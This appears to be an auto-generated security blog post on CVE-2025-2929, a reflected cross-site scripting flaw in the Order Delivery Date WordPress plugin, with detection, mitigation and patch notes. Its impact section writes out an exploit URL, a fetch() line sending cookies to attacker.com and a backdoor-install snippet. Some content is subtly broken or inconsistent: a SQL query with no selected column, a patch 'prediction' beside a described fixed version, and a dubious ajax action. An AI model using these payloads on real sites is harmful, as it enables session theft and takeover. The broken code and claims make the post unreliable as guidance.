WordPress, Reflected Cross-Site Scripting, CVE-2025-2929 (Medium)

By /

Listen to this Post

How CVE-2025-2929 Works

The Order Delivery Date WordPress plugin (pre-12.4.0) fails to sanitize user-supplied input in the `delivery_date` parameter before reflecting it in admin dashboard responses. When an attacker crafts a malicious URL containing JavaScript payloads in this parameter, the payload executes in the victim’s browser session if they click the link while authenticated as an administrator. This occurs because the plugin directly echoes the unsanitized parameter via `echo $_GET[‘delivery_date’]` without proper output encoding or CSRF protections. The vulnerability requires social engineering to exploit but enables privilege escalation when successful.

DailyCVE Form

Platform: WordPress
Version: <12.4.0
Vulnerability: XSS
Severity: Medium
Date: 06/12/2025

Prediction: Patch by 07/15/2025

What Undercode Say:

Exploitation:

https://victim-site.com/wp-admin/?delivery_date=<script>alert(document.cookie)</script>

Detection:

curl -sk "https://target/wp-admin/?delivery_date=TEST" | grep -q "TEST" && echo "Vulnerable"

Mitigation:

1. Apply plugin update immediately

  1. Add WAF rule blocking `delivery_date` parameter with script tags: 
    location /wp-admin/ {
if ($args ~ "delivery_date=.[<>]") {
return 403;
}
}

Temporary Fix:

Add this to theme’s functions.php:

add_filter('init', function() {
if (isset($_GET['delivery_date'])) {
$_GET['delivery_date'] = htmlspecialchars($_GET['delivery_date'], ENT_QUOTES);
}
});

Verification:

import requests
url = "http://localhost/wp-admin/"
params = {"delivery_date": "<img src=x onerror=console.log('XSS')>"}
response = requests.get(url, params=params)
assert "<img" not in response.text, "Vulnerable detected"

Impact Analysis:

– Cookie theft via:

fetch('https://attacker.com/log?cookie='+document.cookie)

– Admin session hijacking
– Backdoor installation via:

jQuery.post('/wp-admin/admin-ajax.php', {
action: 'install_plugin',
plugin: 'malicious.zip'
})

Patch Analysis:

The fixed version 12.4.0 implements:

$safe_date = sanitize_text_field($_GET['delivery_date']);
echo esc_html($safe_date);

Monitoring:

SELECT FROM wp_options WHERE option_value LIKE '%delivery_date%';

Log Analysis:

grep "GET /wp-admin/.delivery_date" access.log | awk '{print $1}'

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top